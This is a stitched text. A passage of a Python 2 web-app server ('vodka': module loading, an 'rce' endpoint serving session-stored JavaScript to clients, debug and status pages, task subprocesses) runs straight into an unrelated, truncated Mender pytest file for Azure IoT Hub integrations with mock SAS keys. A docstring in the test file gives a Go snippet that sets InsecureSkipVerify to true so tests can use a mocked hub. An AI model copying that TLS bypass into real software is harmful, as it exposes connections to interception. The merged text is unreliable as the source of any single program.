# module manager returned empty module list, bail
# before bailing unload all old modules that had been
# loaded from manager before
if not s:
for i, mod in self.module_status.items():
if mod.get("source") == "manager":
del self.module_status[i]
return self.module_status
for k, mod in s.get("modules").items():
if self.is_module_loaded(k):
old = self.module_status.get(k)
# check if module is loaded from disk already, if it is, bail
if old.get("source") == "disk":
continue
# mod has already been loaded into vodka, but a new version is available
if old.get("version") != mod.get("version") or old.get("status") != mod.get("status"):
self.info("Mod version or status change for '%s' : %s" % (k, mod.get("version")))
modstat = {
"version" : mod.get("version"),
"mobile" : mod.get("mobile", 0),
"status" : mod.get("status"),
"dependencies" : mod.get("dependencies", []),
"source" : "manager",
"access_level" : mod.get("access_level", 0),
"path" : None
}
# load validator json for this module
validator_code = self.module_manager.module_validator_code(mod.get("namespace"), mod.get("name"))
if validator_code:
validator.add_from_json(validator_code)
self.module_status[k] = modstat
# reload templates
self.templates.update(self.module_manager.module_templates(mod.get("namespace"), mod.get("name")))
else:
# mod has not been loaded into vodka yet, load it.
# if module namespace is disabled in config, bail
if self.mcfg.get(mod.get("namespace")) == "disabled":
continue
# if module is disabled
if self.mcfg.get(k) == "disabled":
continue
# if module not approved yet
if not mod.get("status"):
continue
self.info("New vodka mod discovered: %s, loading ..." % k)
self.load_module(k)
# finally find any modules that have been removed
for k, mod in self.module_status.items():
if not mod.get("source") == "manager":
continue
if not s.get("modules").get(k):
self.info("Module %s has been removed from database, unloading" % k)
del self.module_status[k]
return self.module_status
#############################################################################
def clear_headers(self, request, keys):
headers = request.get("headers")
i = 0
l = len(headers)
while i < l:
header = headers[i][0]
if header.lower() in keys:
headers.remove(headers[i])
i = 0
l = len(headers)
continue
i += 1
#############################################################################
@webapp.expose
def module_media(self, mod_name, version, file, **kwargs):
req = kwargs.get("__request")
environ = kwargs.get("__environ")
ses = self.get_session(req)
if not self.module_manager:
return ""
man = self.module_manager
if not re.match("^appstore.", file):
if not ses.check_20c_module(mod_name) & ACCESS_READ:
return "";
if not self.is_module_loaded(mod_name):
raise webapp.HTTPError(404)
full_name = mod_name
mod_name = mod_name.split(".")
namespace = mod_name[0]
name = ".".join(mod_name[1:])
info = man.module_info(namespace, name)
modstat = self.module_status.get(full_name)
maxAge = 36000
fromDisk = False
if not info or modstat.get("path_js"):
path = modstat.get("path_js")
path = os.path.dirname(path)
path = os.path.join(path, "media", file);
if path and os.path.exists(path):
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(os.path.getmtime(path))
fromDisk = True
else:
raise webapp.HTTPError(404)
else:
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(info.get("modified"))
headers = req.get("headers")
cacheHeaders = [
("Pragma", "cache"),
("Cache-Control", "max-age=%d, must-revalidate" % maxAge)
]
#check if file has been modified and send cache response
#if possible
if environ.get('HTTP_IF_MODIFIED_SINCE') == mtime:
headers.extend(cacheHeaders)
req["status"] = 304
return ""
headers.append(("Last-Modified", mtime))
mime = "text/plain"
if not fromDisk:
contents = man.module_media_content(namespace,name, file);
comp = man.module_component(namespace,name, file)
mime = str(comp.get("mime")[0])
elif path:
f = open(path, "r")
contents = f.read()
f.close()
mime = mimetypes.guess_type(path)[0]
headers.extend([
("content-type", mime)
])
return contents
#############################################################################
def module_javascript_component(self, mod_name, comp="unload.js"):
"""
Return a module's javascript component that isn't part of the
module's main javascript, such as the module unload script
"""
if not self.is_module_loaded(mod_name):
return
modstat = self.module_status.get(mod_name)
if modstat.get("path_js"):
# from disk
path = os.path.join(
os.path.dirname(modstat.get("path_js")),
comp
)
if not os.path.exists(path):
return ""
f = open(path, "r")
code = f.read()
f.close()
return code
else:
# from cb
man = self.module_manager
namespace, name = man.module_token(mod_name)
minified = self.config.get("modules",{}).get("minified")
if (is_production() and minified != "no") or minified == "yes":
minified = True
else:
minified = False
scr = man.module_component(namespace, name, comp)
if scr:
if minified:
return scr.get("minified")
else:
return scr.get("contents")
return ""
#############################################################################
# return code for remote code execution
# this data wont be cached ever
# RCE is currently primarily used to unload modules on the client side
# after the client no longer has access to them (perms revoked)
@webapp.expose
def rce(self, rce_name, **kwargs):
req = kwargs.get("__request")
environ = kwargs.get("__environ")
ses = self.get_session(req)
# make sure RCE actually exists on session before proceeding
if not ses.rce.has_key(rce_name):
return
rce = ses.rce.get(rce_name)
# prepare code
code = "\n".join([
"(function(){",
"TwentyC.IO.Send(TwentyC.rpcUrl+'/rce_satisfy', {name : '%s', id:'%s'},0,0,0,'POST');" % (rce_name, rce.get("id")),
rce.get("code"),
"})();"
])
headers = req.get("headers")
headers.extend([
("content-type", "text/javascript")
])
# send code
return code
#############################################################################
# load module javascript
@webapp.expose
def ui_component(self, mod_name, version, **kwargs):
req = kwargs.get("__request")
environ = kwargs.get("__environ")
ses = self.get_session(req)
if not self.module_manager:
return ""
if not self.is_module_loaded(mod_name):
raise webapp.HTTPError(404)
man = self.module_manager
if not ses.check_20c_module(mod_name) & ACCESS_READ:
raise webapp.HTTPError(401)
full_mod_name = mod_name
mod_name = mod_name.split(".")
namespace = mod_name[0]
name = ".".join(mod_name[1:])
info = man.module_info(namespace, name)
modstat = self.module_status.get(full_mod_name)
maxAge = 36000
path = None
minified = self.config.get("modules",{}).get("minified")
if (is_production() and minified != "no") or minified == "yes":
minified = True
else:
minified = False
fromDisk = False
if info and info.get("status") == 0:
return "// Module is currently deactivated"
if not info or modstat.get("path_js"):
path = modstat.get("path_js")
if minified:
bname = os.path.basename(path)
dname = os.path.dirname(path)
path = os.path.join(dname, "_min_.%s" % bname)
if path and os.path.exists(path):
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(os.path.getmtime(path))
fromDisk = True
else:
raise webapp.HTTPError(404)
else:
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(info.get("modified"))
headers = req.get("headers")
headers.extend([
("content-type", "text/javascript")
])
cacheHeaders = [
("Pragma", "cache"),
("Cache-Control", "max-age=%d, must-revalidate" % maxAge)
]
#check if file has been modified and send cache response
#if possible
if environ.get('HTTP_IF_MODIFIED_SINCE') == mtime:
headers.extend(cacheHeaders)
req["status"] = 304
return ""
headers.append(("Last-Modified", mtime))
code = "(function() {\n"
code += "var __MODULE_VERSION='%s';\n" % self.module_version(full_mod_name)
code += "var __MODULE_NAME='%s';\n" % full_mod_name
if not fromDisk:
code += man.module_javascript(namespace,name,minified=minified)
elif path:
f = open(path, "r")
code += f.read()
f.close()
code += "\nTwentyC.Modules.loaded['%s.%s'] = { version : '%s' };" % (namespace,name,version)
code += "\n})()"
return code
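# For reference, the javascript returned above is wrapped so each module registers
# itself with the client side module registry; roughly (illustrative values):
#   (function() {
#     var __MODULE_VERSION='1.0.0';
#     var __MODULE_NAME='example.mymodule';
#     /* module javascript */
#     TwentyC.Modules.loaded['example.mymodule'] = { version : '1.0.0' };
#   })()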
#############################################################################
# path: /dbg_refcounts
@webapp.expose
def dbg_refcounts(self, **kwargs):
"""
return serialized representation of objects and their refcounts
"""
req = kwargs.get("__request");
if self.statusKey not in kwargs:
raise webapp.HTTPError(404)
if not "ses" in kwargs:
d = {}
sys.modules
# collect all classes
for m in sys.modules.values():
for sym in dir(m):
o = getattr (m, sym)
if type(o) is types.ClassType:
d[o] = sys.getrefcount (o)
# sort by refcount
pairs = map (lambda x: (x[1],x[0]), d.items())
pairs.sort()
pairs.reverse()
return str(pairs)
else:
import gc
ses = webapp.sessionCache[kwargs.get("__request").get("session").id];
r = "Reference count for this session object: %d\n\n" % sys.getrefcount(ses)
r += self.dbg_refs(ses, [], max=int(kwargs.get("max",1)), show_frame=kwargs.get("show_frame"))
gc.collect()
return r
def dbg_refs(self, obj, n, max=3, show_frame=None):
import gc
r = ""
i = 0
if len(n) > max:
return ""
refs = gc.get_referrers(obj)
for ref in refs:
if i > 5:
break
if ref == obj:
continue
if str(type(ref)) == "<type 'frame'>" and not show_frame:
continue
i+=1
r += "".center(len(n),"\t")+"%s\n" % (type(ref))
n.append(1)
r += self.dbg_refs(ref, n, max)
n.pop()
return r
##############################################################################
# play custom uploaded sound
@webapp.expose
def playsound(self, **kwargs):
"""
Send a soundfile response
"""
req = kwargs.get("__request")
ses = self.authed_session(req)
sound = kwargs.get('sound')
if sound:
customSounds = ses.pref_manager.get("sounds")
if customSounds.get(sound):
headers = req.get("headers")
headers.extend([
("content-type", "audio/mpeg")
])
return base64.b64decode(customSounds.get(sound))
else:
sounds = ses.app.config.get("sounds",{})
if sounds.get(sound):
raise webapp.HTTPRedirect("/base/sound/"+sounds.get(sound).strip("'"))
else:
raise Exception("Invalid sound id")
else:
raise Exception("No Sound Specified")
#############################################################################
@webapp.expose
def index(self, **kwargs):
ses = self.get_session(kwargs.get("__request"))
return ses.tmpl("index.tmpl", request=kwargs.get("__request"))
#############################################################################
def status_json(self):
return {
"app_status" : self.app_status,
"status" : "OK"
}
#############################################################################
@bartender.expose
def toggle_profile_requests(self, **kwargs):
if kwargs.get("state") == "on":
self.profiling_wsgi = True
else:
self.profiling_wsgi = False
application.profile = self.profiling_wsgi
webapp.WSGI_PROFILING = self.profiling_wsgi
return { "state" : self.profiling_wsgi }
#############################################################################
@bartender.expose
def profile_json_requests(self, **kwargs):
rv = {}
if self.profiling_wsgi:
rv = { "overview" : [], "recent" : []}
#overview
overview = rv["overview"]
lst = webapp.profile.get("overview").items()
lst = sorted(lst, key=lambda p: p[1].get("num"), reverse=True)
for path, profile in lst:
data = {"num" : profile.get("num"), "path":path}
data.update(profile.get("time"))
overview.append(data)
#recent requests
lst = webapp.profile.get("recent")
recent = rv["recent"]
for entry in lst:
times = entry.get("time")
times['path'] = entry.get("path")
recent.append(times)
else:
rv["alert"] = "Request profiling is not turned on"
return rv
#############################################################################
@webapp.expose
def status(self, **kwargs):
req = kwargs.get("__request");
if self.statusKey not in kwargs:
raise webapp.HTTPError(404)
status = "OK"
show_profile = kwargs.has_key("profile")
show_debugging = kwargs.has_key("debug")
show_tasks = kwargs.has_key("tasks")
# General information about user requests
n = 0
r = "%s\n<pre>%d user requests/sec\n%s user requests (total)\n\n" % (
status,
self.http_requests_prev,
self.http_requests_total
)
# Debugging information
if show_debugging:
r += "\n\nClient Pool Size: BUSY: %d, IDLE: %d" % (len(self.client_pool.busy), len(self.client_pool.pool))
if self.debugging:
r += "\nBusy clients requested by:"
for client in self.client_pool.busy:
r += "\n%s: %s" % (client.id, client.requested_by)
# WSGI Request profiling
if self.profiling_wsgi and show_profile:
r += "\n\nWeb Sessions: %d" % len(webapp.sessionCache.keys())
r += "\n\nTotal Time spent on http requests\n"
r += "<table style=\"width:100%; text-align:left;\">"
lst = webapp.profile.get("overview").items()
lst = sorted(lst, key=lambda p: p[1].get("num"), reverse=True)
headers = False
for path, profile in lst:
if not headers:
headers = profile.get("time").keys()
r += "<tr><th>Path</th><th>Num</th>"
for handler in headers:
r+= "<th>%s</th>" % handler
r += "</tr>"
r += "<tr><td>%s</td><td>%d</td>" % (path, profile.get("num"))
for handler in headers:
r += "<td>%f</td>" % (profile.get("time").get(handler, 0.0))
r += "</tr>"
r += "</table>"
r += "\n\nMost recent requests\n"
r += "<table style=\"width:100%; text-align:left;\">"
lst = webapp.profile.get("recent")
headers = False
for entry in lst:
path = entry.get("path")
times = entry.get("time")
if not headers:
headers = times.keys()
r += "<tr><th>Path</th>"
for handler in headers:
r+= "<th>%s</th>" % handler
r += "</tr>"
r += "<tr><td>%s</td>" % (path)
for handler in headers:
r += "<td>%f</td>" % (times.get(handler, 0.0))
r += "</tr>"
r += "</table>"
r += str(webapp.profile.get("longest"))
# Task list
if show_tasks:
r += "\n\nTasks"
for id, task in self.tasks.items():
r += "\nID: %s OWN: %s PS: %s INFO: %s R: %s CMD: %s %s %s" % (
id,
task.get("owner"),
task.get("process").poll(),
task.get("info"),
str(type(task.get("result"))).replace("<","").replace(">",""),
task.get("module"),
task.get("task"),
task.get("params")
)
r += "</pre>"
return r
#############################################################################
def update_sesmap(self, data):
if not hasattr(self, "lockSesmap"):
self.lockSesmap = threading.Lock()
self.lockSesmap.acquire()
try:
self.log.debug("Updating session map (cache)")
self.session_map.update(data)
for sid, status in data.items():
if not status:
del self.session_map[sid]
if self.xbahn:
self.log.debug("Updating session map (xbahn)")
self.xbahn.send(None, "__vodka.update.session_map", data)
self.log.debug("Update session map (xbahn) COMPLETED")
finally:
self.lockSesmap.release()
#############################################################################
def logout_all_sessions(self):
pass
#############################################################################
def task_update_receiver(self, xb, msg, data):
if type(data) == dict:
self.task_info_receiver(xb, msg, data)
else:
self.task_result_receiver(xb, msg, data)
#############################################################################
def task_info_receiver(self, xb, msg, data):
id = msg.subject.split(".")[-1]
#self.log.debug("Received task info %s: %s" % (id, data))
if self.tasks.has_key(id):
info = self.tasks[id].get("info",{})
if info.get("owner") and info.get("owner") not in webapp.sessionCache.keys():
webapp.log.info("Ignoring task info since the owning user session is no longer around")
return self.task_cleanup(id)
else:
self.tasks[id]["info"].update(data)
self.tasks[id]["info"].update(update_t=time.time())
if self.tasks[id]["info"].get("status") == vodkatask.FINISHED:
if self.tasks[id].get("callback"):
d = VodkaAppThread(self.tasks[id]["callback"])
d.start(self.task_result(id), self, id)
#############################################################################
def task_result_receiver(self, xb, msg, data):
id = msg.subject.split(".")[-1]
if self.tasks.has_key(id):
task = self.tasks.get(id)
task["info"].update(update_t=time.time())
#self.log.debug("got task result data: %s" % msg.subject)
if not task.get("result"):
task["result"] = data
else:
existing = task.get("result")
if type(data) == list and type(existing) == list:
existing.extend(data)
else:
existing.update(data)
#############################################################################
def task_info(self, id):
return self.tasks.get(id, {}).get("info")
#############################################################################
def task_result(self, id):
data = self.tasks.get(id, {}).get("result")
if data:
del self.tasks[id]["result"]
return data
#############################################################################
def task_cleanup_worker(self):
while webapp.serverStatus != webapp.SERVER_SHUTTING_DOWN:
t = time.time()
cleanup = []
for id, task in self.tasks.items():
info = task.get("info",{})
if info.get("status") == vodkatask.FINISHED:
if not task.get("result") and t-info.get("end_t",0) > 60:
self.log.debug("Removing task %s because it is finished and its result has been retrieved" % id)
cleanup.append(id)
elif t-info.get("end_t", t) > self.taskCleanupMargin:
self.log.debug("Removing task %s because it is finished and result has not been requested in time (%d seconds)" % (id, self.taskCleanupMargin))
cleanup.append(id)
elif t-info.get("start_t", 0) > self.taskTimeoutMargin:
self.log.debug("Removing task %s because it did not finish before timeout margin was up (%d seconds)" % (id, self.taskTimeoutMargin))
self.task_terminate(id)
info.update(zombie=True, end_t=t, status=vodkatask.FINISHED, error="Terminated: task timed out")
elif t-info.get("update_t", 0) > self.taskSilenceMargin:
self.log.debug("Removing task %s because it was silent for too long (> %d seconds)" % (id, self.taskSilenceMargin))
self.task_terminate(id)
info.update(zombie=True, end_t=t, status=vodkatask.FINISHED, error="Terminated: task unresponsive")
for id in cleanup:
self.task_cleanup(id)
time.sleep(1)
#############################################################################
def task_cleanup(self, id):
task = self.tasks.get(id)
if not task:
return
info = task.get("info")
if info:
if task.get("owner"):
ses = webapp.sessionCache.get(task.get("owner")).data.get("client_session")
ses.tasks.remove(id)
try:
del self.tasks[id]
except:
pass
#############################################################################
def tasks_terminate(self):
tasks = self.tasks.items()
self.info("Terminating tasks %s" % tasks)
for id, task in tasks:
self.task_terminate(id)
#############################################################################
def task_terminate(self, id):
if self.tasks.has_key(id):
task = self.tasks[id]
self.info("Terminating task %s" % id)
try:
proc = task.get("process")
if proc and proc.pid:
os.kill(int(proc.pid), signal.SIGTERM)
if not proc.poll():
os.kill(int(proc.pid), signal.SIGKILL)
except Exception, inst:
self.log.error(traceback.format_exc())
#############################################################################
def task_run(self, moduleName, taskName, id="task", params={}, target="download", filename=None, ses=None, limitResult=0, source="unknown", callback=None):
id = "%s-%s" % (id, str(webapp.uuid.uuid4()))
params = jsonlib.dumps(params)
cmd = [
"python",
os.path.join(vodkaPath, "task.py"),
moduleName,
taskName,
self.id,
id,
"--config",
serverConfPath,
"--param",
params
]
if limitResult:
cmd.extend(["--limit", str(limitResult)])
p = subprocess.Popen(cmd, close_fds=True)
if ses:
owner = ses.client_id
else:
owner = None
print "%s runtask:%s" % (p.pid, cmd)
self.tasks[id] = {
"owner" : owner,
"process" : p,
"callback" : callback,
"module" : moduleName,
"task" : taskName,
"params" : params,
"info" : {
"id" : id,
"source" : source,
"start_t" : time.time(),
"update_t" : time.time(),
"filename" : filename,
"target" : target
}
}
print "%s" % self.tasks.keys()
return (id, p)
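# Minimal usage sketch for task_run() (module/task names below are hypothetical): it
# spawns task.py as a subprocess and tracks it in self.tasks until task_cleanup_worker
# reaps it.
#   task_id, proc = app.task_run(
#     "example.reports", "build_report",
#     id="report", params={"range": "1d"},
#     ses=client_session, callback=my_callback
#   )
#   # later: app.task_info(task_id), app.task_result(task_id)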
###############################################################################
# ClientPool
###############################################################################
class ClientPool:
"""
ClientPool holds a pool of VodkaClients which each can hold connections to databases
and so forth.
Makes client usage thread-safe
"""
idx = 0
def __init__(self, size, app, idstr="pooled_%d"):
"""
Initialize ClientPool
size should be the amount of initial connections in the pool, needs
to be >= 1
app needs to be a reference to the VodkaApp Instance
idstr will be the prefix for the client id
"""
if size < 1:
raise Exception("Client Pool size needs to be at least 1")
i = 0
self.busy = []
self.pool = []
self.app = app
self.base_size = size
while i < size:
self.pool.append(self.app._Client(
idstr % i,
pool = self,
app = self.app
))
i += 1
self.idx = i
#############################################################################
def get_client(self, for_duration=10):
"""
Return the first client in the pool that is currently not in use.
Also respawn any clients that have timed out
for_duration <int> 10 - claim the client for n seconds, if it is not returned
within the allotted time it will be timed out and respawned
"""
t = time.time()
r = None
self.respawn_timed_out(t)
if self.pool:
i = 0
for r in self.pool:
if r.status == 2 and r.client:
self.pool.pop(i)
break
r.connect()
#r = self.pool.pop()
r = None
i += 1
# no connected client could be obtained, create a new
# client object and connect it
if not r:
r = self.app._Client(
"pooled_%d" % self.idx,
pool = self,
app = self.app,
)
self.idx += 1
# if debugging is on find out what requested the client and log it
if self.app.debugging:
r.requested_by = []
for row in inspect.stack():
r.requested_by.append((row[3], row[2]))
self.app.log.debug("Client '%s' requested by %s" % (r.id, r.requested_by))
self.busy.append(r)
r.last_request = []
r.for_duration = t
r.time = t
return r
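# Typical (illustrative) usage of the pool: claim a client, use it, then hand it back
# via respawn() before for_duration expires, otherwise respawn_timed_out() reclaims it.
#   client = app.client_pool.get_client(for_duration=10)
#   try:
#     pass  # use client.client / issue requests here
#   finally:
#     app.client_pool.respawn(client)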
############################################################################
# cycle through busy clients and find those that have been claimed for longer than
# their for_duration, meaning they have timed out and should be respawned
def respawn_timed_out(self, t):
for client in self.busy:
if t - client.time > client.for_duration:
if webapp.log:
if not client.last_request or client.last_request[0] != "login":
webapp.log.debug("%s: %s has TIMED OUT, attempting to remove/respawn" % (
client.id,
client.last_request
))
elif client.last_request and client.last_request[0] == "login":
webapp.log.debug("%s: %s has TIMED OUT, attempting to remove/respawn" % (
client.id,
client.last_request[0]
))
try:
client.disconnect()
self.busy.remove(client)
if client.client and client.client.transport.isOpen():
client.client.transport.close()
client.connect()
if self.app.debugging:
client.requested_by = None
self.pool.append(client)
if webapp.log:
webapp.log.debug("%s respawned after timeout" % client.id)
except Exception, inst:
webapp.log.error("Client Pool Cleanup Error: "+traceback.format_exc())
#############################################################################
# respawn client
def respawn(self, client):
"""
Respawn client, remove client from busy list
"""
try:
self.busy.remove(client)
except:
pass
if not client in self.pool:
busy = len(self.busy)
pool = len(self.pool)
if not busy and pool > self.base_size:
client.disconnect()
webapp.log.debug("retired: %s (%d free, %d busy)" % (client.id, pool, busy))
else:
if self.app.debugging:
client.requested_by = None
self.pool.append(client)
if webapp.log:
webapp.log.debug("respawned: %s (%d free, %d busy)" % (client.id, pool, busy))
#############################################################################
# reconnect all clients
def reconnect(self):
"""
Reconnect all clients in the pool,
and remove all clients from the busy list
"""
self.pool.extend(self.busy)
self.busy = []
for client in self.pool:
client.connect()
#############################################################################
# disconnect all
def disconnect(self):
"""
Disconnect all clients in the pool and clear busy list
"""
self.pool.extend(self.busy)
self.busy = []
for client in self.pool:
client.disconnect()
self.pool = []
###############################################################################
# VodkaClient
###############################################################################
class VodkaClient(object):
"""
Vodka client base class
"""
def __init__(self, id="VodkaClient", pool=None, app=None, timeout=None):
self.config = webapp.configs.get(serverConfPath,{})
self.id = id
self.busy = False
self.timeout = timeout
self.time = 0
self.for_duration = 10
self.status = 0
self.isMain = False
self.children = None
self.db_prefs = None
self.db_modules = None
self.pool = pool
self.app = app
self.ses_id = ""
self.lockBusy = threading.RLock()
self.last_request = []
if module_py_components:
for name in module_py_load_order:
mod = module_py_components.get(name)
if hasattr(mod, 'extend_client'):
mod.extend_client(self, VodkaClient);
if app:
self.db_prefs = app.db_prefs
def connect(self, *args, **kwargs):
pass
def disconnect(self, *args, **kwargs):
pass
###############################################################################
# Spawn and mount vodka application on root path
def vodka_shutdown():
app = webapp.app_map["vodka"]
app.stop()
webapp.serverStatus = webapp.SERVER_SHUTTING_DOWN
def init():
App = webapp.register_app(VodkaApp(), "vodka", "")
webapp.start_plugins(App.config)
webapp.shutdown_handlers.append(vodka_shutdown)
if serverConf.get("wsgiserver") == "gevent":
gevent_start_server()
if serverConf.get("wsgiserver") == "eventlet":
eventlet_start_server()
# Copyright 2022 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict
from typing import Optional
import pytest
import logging
import os
import re
import ssl
import uuid
from base64 import b64decode
import trustme
from azure.iot.hub import IoTHubRegistryManager
from pytest_httpserver import HTTPServer
from redo import retrier, retriable
from requests.models import Response
from testutils.api import (
deviceauth,
deviceconfig,
iot_manager as iot,
useradm,
)
from testutils.api.client import ApiClient, get_free_tcp_port
from testutils.common import (
Device,
User,
create_org,
create_user,
create_user_test_setup,
create_tenant_test_setup,
clean_mongo,
make_accepted_device,
mongo,
)
HTTPServer.DEFAULT_LISTEN_PORT = get_free_tcp_port()
HTTPServer.DEFAULT_LISTEN_HOST = (
"mender-backend-tests-runner" # name of the compose service
)
@pytest.fixture(scope="session")
def ca():
return trustme.CA()
@pytest.fixture(scope="session")
def localhost_cert(ca):
return ca.issue_cert(HTTPServer.DEFAULT_LISTEN_HOST)
@pytest.fixture(scope="session")
def httpserver_ssl_context(localhost_cert) -> ssl.SSLContext:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
crt = localhost_cert.cert_chain_pems[0]
key = localhost_cert.private_key_pem
with crt.tempfile() as crt_file, key.tempfile() as key_file:
context.load_cert_chain(crt_file, key_file)
return context
class _TestAzureBase:
azure_api = ApiClient(base_url=iot.URL_MGMT, host=iot.HOST, schema="http://")
@property
def logger(self):
return logging.getLogger(self.__class__.__name__)
def save_integration(self, user: User, integration: Dict) -> Response:
response = (
self.azure_api.with_auth(user.utoken)
.with_header("Content-Type", "application/json")
.call("POST", iot.URL_INTEGRATIONS, integration)
)
return response
def get_integrations(self, user: User) -> Response:
response = (
self.azure_api.with_auth(user.utoken)
.with_header("Content-Type", "application/json")
.call("GET", iot.URL_INTEGRATIONS)
)
return response
def check_integrations(self, user: User, expected_integration: Dict):
"""Make sure iot-manager properly saves connection strings in its database."""
response = self.save_integration(user, expected_integration)
assert response.status_code == 201
self.logger.info("saved integrations")
self.logger.info("getting integrations")
response = self.get_integrations(user)
assert response.status_code == 200
self.logger.info(f"got integrations: {response.text}")
integrations = response.json()
assert len(integrations) > 0
assert "credentials" in integrations[0].keys()
assert "connection_string" in integrations[0]["credentials"].keys()
actual = integrations[0]["credentials"]["connection_string"]
# Check for equality by parts:
# Check that actual properties are a subset of expected integrations
for part in actual.split(";"):
            # SharedAccessKey will be masked, with only the first 4 characters visible
            # and the rest of the string replaced with a placeholder. For this reason,
            # we only compare the first 20 characters.
if part.startswith("SharedAccessKey="):
part = part[:20]
assert part in expected_integration["credentials"]["connection_string"]
# Check that expected properties are a subset of actual integrations
for part in expected_integration["credentials"]["connection_string"].split(";"):
            # SharedAccessKey will be masked, with only the first 4 characters visible
            # and the rest of the string replaced with a placeholder. For this reason,
            # we only compare the first 20 characters.
if part.startswith("SharedAccessKey="):
part = part[:20]
assert part in actual
class TestAzureIntegrations(_TestAzureBase):
@pytest.mark.parametrize(
"expected_integration",
[
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=OldKey",
"type": "sas",
},
},
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=NewKey",
"type": "sas",
},
},
],
)
def test_get_and_set(self, clean_mongo, expected_integration):
"""
Check that we can set and get integrations
"""
self.logger.info("creating user in OS mode")
user = create_user_test_setup()
self.check_integrations(user, expected_integration)
class TestAzureIntegrationsEnterprise(_TestAzureBase):
@pytest.mark.parametrize(
"expected_integration",
[
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=OldKey",
"type": "sas",
},
},
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=NewKey",
"type": "sas",
},
},
],
)
def test_get_and_set(self, clean_mongo, expected_integration):
"""
Check that we can set and get integrations
"""
self.logger.info("creating tenant and user in enterprise mode")
tenant = create_tenant_test_setup()
user = tenant.users[0]
self.check_integrations(user, expected_integration)
def get_connection_string():
"""Determine whether AZURE_IOTHUB_CONNECTIONSTRING or AZURE_IOTHUB_CONNECTIONSTRING_B64
environment variable is set.
"""
azure_iot_hub_mock = os.environ.get("AZURE_IOTHUB_MOCK")
if azure_iot_hub_mock:
mock_sas_key = "QXp1cmUgSW90IEh1YiBjb25uZWN0aW9uIHN0cmluZw=="
mock_sas_policy = "mender-test-policy"
return f"HostName={HTTPServer.DEFAULT_LISTEN_HOST}:{HTTPServer.DEFAULT_LISTEN_PORT};SharedAccessKeyName={mock_sas_policy};SharedAccessKey={mock_sas_key}"
connection_string = os.environ.get("AZURE_IOTHUB_CONNECTIONSTRING")
if connection_string is None:
cs_b64 = os.environ.get("AZURE_IOTHUB_CONNECTIONSTRING_B64")
if cs_b64 is None:
pytest.skip(
"Test requires setting AZURE_IOTHUB_CONNECTIONSTRING "
+ "or AZURE_IOTHUB_CONNECTIONSTRING_B64"
)
connection_string = b64decode(cs_b64).decode("utf-8")
return connection_string
@pytest.fixture(scope="function")
def azure_user(clean_mongo) -> Optional[User]:
"""Create Mender user and create an Azure IoT Hub integration in iot-manager using the connection string."""
api_azure = ApiClient(base_url=iot.URL_MGMT)
uuidv4 = str(uuid.uuid4())
try:
tenant = create_org(
"test.mender.io-" + uuidv4, f"user+{uuidv4}@example.com", "password123",
)
user = tenant.users[0]
user.tenant = tenant
except RuntimeError: # If open-source
user = create_user(f"user+{uuidv4}@example.com", "password123")
# Authorize
rsp = ApiClient(useradm.URL_MGMT).call(
"POST", useradm.URL_LOGIN, auth=(user.name, user.pwd)
)
assert rsp.status_code == 200
user.token = rsp.text
connection_string = get_connection_string()
integration = {
"provider": "iot-hub",
"credentials": {"connection_string": connection_string, "type": "sas"},
}
# create the integration in iot-manager
rsp = api_azure.with_auth(user.token).call(
"POST", iot.URL_INTEGRATIONS, body=integration
)
assert rsp.status_code == 201
yield user
def get_azure_client():
connection_string = get_connection_string()
azure_iot_hub_mock = os.environ.get("AZURE_IOTHUB_MOCK")
if azure_iot_hub_mock:
client = IoTHubRegistryManager(
connection_string=connection_string,
host="mock_host",
token_credential="test_token",
)
client.protocol.config.connection.verify = False
return client
return IoTHubRegistryManager.from_connection_string(connection_string)
class _TestAzureDeviceLifecycleBase:
"""Test device lifecycle in real or mocked Azure IoT Hub. Real Azure is used by default in CI.
    Note: the following snippet needs to be added to azure-iot-manager's router.go to allow insecure HTTPS requests when the mocked Azure is used:
conf := NewConfig(config...)
customTransport := &(*http.DefaultTransport.(*http.Transport))
customTransport.TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
if conf.Client == nil {
conf.Client = &http.Client{Transport: customTransport}
}
"""
@classmethod
def setup_class(cls):
cls.azure_iot_hub_mock = os.environ.get("AZURE_IOTHUB_MOCK")
cls.azure_client = get_azure_client()
cls.api_devauth_devices = ApiClient(base_url=deviceauth.URL_DEVICES)
cls.api_devauth_mgmt = ApiClient(base_url=deviceauth.URL_MGMT)
cls.api_azure = ApiClient(base_url=iot.URL_MGMT)
cls.api_deviceconfig = ApiClient(base_url=deviceconfig.URL_MGMT)
cls.devices = list()
cls.logger = logging.getLogger(cls.__class__.__name__)
@classmethod
def teardown_class(cls):
"""Remove all devices created during test from Azure IoT Hub."""
if not cls.azure_iot_hub_mock:
cls.logger.info(
f"Azure IoT Hub test teardown - removing devices: {cls.devices}"
)
for device_id in cls.devices:
cls.azure_client.delete_device(device_id)
@staticmethod
def _prepare_iot_hub_upsert_device_response(status: str = "enabled") -> Dict:
"""Adjustable Azure IoT Hub GET /devices/<ID> response model."""
return {
"status": status,
"authentication": {
"provider": "sas",
"symmetricKey": {
"primaryKey": "Tm9ydGhlcm4udGVjaCBpcyB0aGUgYmVzdCBjb21wYW55IGluIHRoZSB3b3JsZA==",
"secondaryKey": "Tm9ydGhlcm4udGVjaCAtIHNlY3VyaW5nIHdvcmxkJ3MgY29ubmVjdGVkIGRldmljZXM=",
},
"x509Thumbprint": {"primaryThumbprint": "", "secondaryThumbprint": ""},
},
"properties": {
